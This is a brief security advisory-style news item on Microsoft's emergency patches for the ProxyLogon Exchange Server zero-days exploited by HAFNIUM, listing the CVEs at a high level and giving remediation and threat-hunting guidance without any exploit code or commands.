Microsoft Issues Out-of-Band Patches for Exchange Server ProxyLogon Zero-Days
Microsoft released emergency security updates on March 2, 2021 to fix four Exchange Server zero-days (ProxyLogon) actively exploited by the HAFNIUM group, urging on-premises operators worldwide to patch or isolate impacted servers immediately.
Executive briefing: Microsoft published out-of-band security updates on for Microsoft Exchange Server 2013, 2016, and 2019 following active exploitation of chained zero-days dubbed ProxyLogon. The HAFNIUM threat actor leveraged server-side request forgery and post-authentication deserialization bugs to obtain SYSTEM-level access and drop web shells across tens of thousands of on-premises Exchange deployments.
Critical vulnerabilities
- CVE-2021-26855. SSRF flaw enabling unauthenticated access to Exchange Control Panel endpoints.
- CVE-2021-26857/26858/27065. Post-authentication deserialization and arbitrary file write bugs allowing remote code execution and web shell persistence.
- Mass exploitation. Attackers exfiltrated mailboxes, credential material, and leveraged Defender bypass techniques within hours of disclosure.
Operational guidance
- Immediately apply Microsoft’s cumulative security update or deploy the March 2021 security update bundle for unsupported builds, then revoke potentially compromised credentials.
- Run Microsoft’s Exchange On-Premises Mitigation Tool (EOMT) or the PowerShell Health Checker script to identify vulnerable servers and eradicate persistent web shells.
- Instrument threat hunting for known indicators using Microsoft’s published queries, and ingest CISA Alert AA21-062A for additional detection analytics.